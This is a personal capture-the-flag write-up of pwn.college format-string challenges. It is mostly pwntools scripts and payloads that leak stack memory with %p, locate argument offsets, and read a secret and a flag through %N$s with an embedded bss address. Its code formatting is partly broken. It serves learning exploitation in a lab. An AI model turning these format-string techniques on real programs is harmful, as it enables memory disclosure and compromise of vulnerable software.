Skip to content

Format Strings Exploit

level1.0 & level1.1

%p prints 8 bytes

from pwn import *
p = process('/challenge/babyfmt_level1.0')

p.recvuntil(b'Send your data!')
payload = b'%p'*16
p.sendline(payload)
p.recvuntil(b'I will now call printf on your data!\n\n')

l = str(p.recvline())[2:-3].replace('(nil)','').split('0x')
for x in l:
    try:
        print(bytes.fromhex(x).decode('utf-8')[::-1],end="")
    except:
        pass

p.interactive()

level2.0

  • We know the address where the secret is stored, let it be addr
  • Give a string of space-separated %p as input, like in level1: "%p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p"
  • In output, note at which position addr is printed, say 7th parameter
  • Run the program again, and now give the input %7$s

level2.1

  • Here, we don't knoow the address of the secret
  • Replace all %p with %s where the printed output looks like a memory address
in:  %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p
out: 0x7881a8a0f723 (nil) 0x7881a8930297 0xa 0x25 0xfffffffffffffff8 0x7fffef602e70 (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil)

in:  %s %p %s %p %p %p %s
out:  (nil) H= 0xa 0x25 0xfffffffffffffff8 IXWEYCSPCCAUMXQ

level3.1

  • Given: bss address = 0x404140

  • Try looping over %i$x:

    ```python for i in range(1, 100): p = process('/challenge/babyfmt_level3.0') p.recvuntil(b'Send your data!')

    payload = f'%{i}$x \x40\x41\x40'.encode()

p.sendline(payload)
p.recvuntil(b'I will now call printf on your data!\n\n')
op = p.recvuntil(b'Goodbye!')
if b"40" in op or b"41" in op:
    print(op, "index:",i)
p.close()

    ```

    But, no Luck here - Try looping over %i$lx

    ```text payload = f'%{i}$lx \x40\x41\x40'.encode()

    b'a40414020786c24 @A@\n\n### Goodbye!' index: 23 ```

    getting closer..

    ```text payload = f'%{23}$lx \x40\x41\x40'.encode()

    b'a40414020786c24 @A@\n\n### Goodbye!'

    payload = f'%{23}$lx \x40\x41\x40\x00'.encode()

    b'40414020786c24 @A@\n### Goodbye!'

    payload = f'%{24}$lx AAAA\x40\x41\x40\x00'.encode()

    b'a00404140 AAAA@A@\n### Goodbye!'

    payload = f'%{24}$lx AAAA\x40\x41\x40\x00\x00\x00\x00\x00'.encode()

    b'404140 AAAA@A@\n### Goodbye!'

    payload = f'%{24}$x AAAAA\x40\x41\x40\x00\x00\x00\x00\x00'.encode()

    b'404140 AAAAA@A@\n### Goodbye!'

    payload = f'%{24}$s AAAAA\x40\x41\x40\x00\x00\x00\x00\x00'.encode()

    b'pwn.college{xxxxxxxxxxxxxxxxxxxxxxxx}\n AAAAA@A@\n### Goodbye!' ```